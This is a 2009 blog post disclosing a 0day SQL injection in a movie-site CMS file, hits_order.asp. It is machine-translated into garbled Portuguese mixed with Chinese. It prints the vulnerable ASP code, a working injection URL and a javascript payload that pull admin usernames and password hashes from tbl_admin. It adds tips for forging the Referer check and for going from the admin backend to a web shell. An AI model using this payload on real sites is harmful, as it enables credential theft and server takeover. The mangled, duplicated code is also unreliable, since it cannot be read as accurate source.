Eye-dia do sistema filme 0day-0 dias, hits_order.asp, injeção, sistema de filme olho-dia,-St0p blog

Eye-dia do sistema 0day filme

Esta entrada foi publicada em 25 outubro de 2009

: St0p & My5t3ry
Reproduzido, por favor, indicar a fonte http://www.st0p.org

Ah, e My5t3ry vir para cima com o buraco, entre em contato com o administrador oficial, houve atenção para mim.

Primeiro, deixe-me injetar o problema

A brecha arquivo / p_inc / hits_order.asp

  <- # Include file = ".. / P_inc / config.asp" ->
 <- # Include file = ".. / P_inc / function.asp" ->
 <- # Include file = ".. / P_inc / function_func.asp" ->
 <- # Include file = ".. / P_inc / openconn.asp" ->
 <- # Include file = ".. / P_inc / G_function.asp" ->
 <%
 Then Se não ChkPost () Em seguida,
	 G_error_page_1 resposta. Redirect G_error_page_1
	 ( ) Fim de resposta ()
 End IF
 "Call ChkPost o arquivo / p_inc / function.asp () função para detectar URL de origem
 url,numb ) G_hitss função (url, entorpecido)
	 Str Dim
	 str = ""
	 & numb & " id,m_name,m_pic,m_hits,m_content from qingtiandy_movie where m_look=1 order by m_hits desc,id desc" sql "m_content id, m_name, m_pic, m_hits, de onde qingtiandy_movie m_look = 1 order by desc m_hits, id desc" = "SELECT TOP" & entorpecido e
             'Eu vi ele não dormente, sem filtro
	 server . CreateObject ( G_RS ) Set rs = servidor. CreateObject (G_RS)
	 , 1 rs. aberto sql, conn, 1, 1
	 i = 1
	 Faça o While Not rs. Eof 
		 Array ( "d" ,rs ( 0 ) ,url ) ) d_url = url_ (Array ("d", rs (0), url))
		 "<div class=kkk1_list><a class=bbb href=" & d_url & " title='主演：" & rs ( 2 ) & "'>" & Get_length ( rs ( 1 ) , "" , 32 ) & "</a> (" & rs ( 3 ) & ")</div>" str = str & o "o <div class=kkk1_list> class=bbb href=" & d_url &" title='主演:" & rs (2) & "'>" & Get_length (rs (1), "", 32) & "</ a> (" & rs (3) & ") </ div>
		 i = i + 1
		 rs. MoveNext
	 Laço
	 G_hitss str =
 End Function
 %>
 G_hitss ( request ( "url" ) , request ( "numb" ) ) %> ") document.write ("<% = G_hitss pedido ((" ")%) url"), pedido ("numb>")
 "Aqui filtro entorpecido

A utilização de métodos tais como
1, você pode usar diretamente o Referer software falsificado, visite o endereço a seguir para atingir
Através XMLHTTP forjou a Referer, visite o seguinte endereço implementação
3, de JS JavaScript para controlar a URL de origem

  ( "<a href='/p_inc/hits_order.asp?numb=1 (select str_username from tbl_admin) as username,(select str_pass from tbl_admin) as pass,'>科幻片</a> " ) ; javascript:. documento do write (<a str_username (select href='/p_inc/hits_order.asp?numb=1 de tbl_admin) como username,(select str_pass de tbl_admin) como pass,'> ficção científica </ a> ") ;

http://www.st0p.org/p_inc/hits_order.asp?numb=1 (str_username seleção de tbl_admin) como nome de usuário, (select str_pass de tbl_admin) como passagem,

Nota: para saltar por cima do Referer a detecção pode ser por meio do POST, GET, o cookie de uma variedade de maneiras para alcançar injectado. . .

O acesso ao seguinte, o nome do usuário administrador no URL do link, o hash de senha exibido diretamente para fora. .

Crack o hash da senha, porque o fundo pode editar diretamente o arquivo ASP, no fundo e tomar a linha SHELL.

Este procedimento, existem outras falhas. Aqui não é feita. .